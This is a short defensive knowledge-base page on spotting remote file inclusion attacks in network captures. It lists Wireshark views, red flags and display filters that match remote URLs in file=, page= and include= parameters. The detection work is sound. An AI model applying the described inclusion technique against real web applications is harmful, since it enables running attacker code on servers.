Operator On The Wire
← Back to Knowledge Base
BLUE TEAM / SOC / FILTERING / ATTACKS / APPLICATION LAYER / HTTP / ATTACKS

RFI

Attacker forces the application to include and execute a remote file via parameters like file=, page=, include=


Hunting

Statistics → Conversations → IPv4
Statistics → Endpoints → IPv4
Statistics → Protocol Hierarchy
Statistics → IO Graph


Red Flags

  • Full URLs inside parameters (http://, https://)
  • file=, page=, include= pointing to external domains
  • URL-encoded remote references (http%3A%2F%2F)
  • Immediate outbound traffic from web server after request
  • 200 response followed by suspicious server behavior

Filters

# Generic external URL in parameters
http.request.uri contains "http://" or http.request.uri contains "https://"

# Direct remote URL inclusion attempt
http.request.uri matches "(?i)(file=|page=|include=).*https?://"

# URL-encoded remote inclusion
http.request.uri matches "(?i)(file=|page=|include=).*http%3A%2F%2F"

# Correlate suspicious source
http.request.uri matches "(?i)(file=|page=|include=)" and ip.src == 192.168.10.5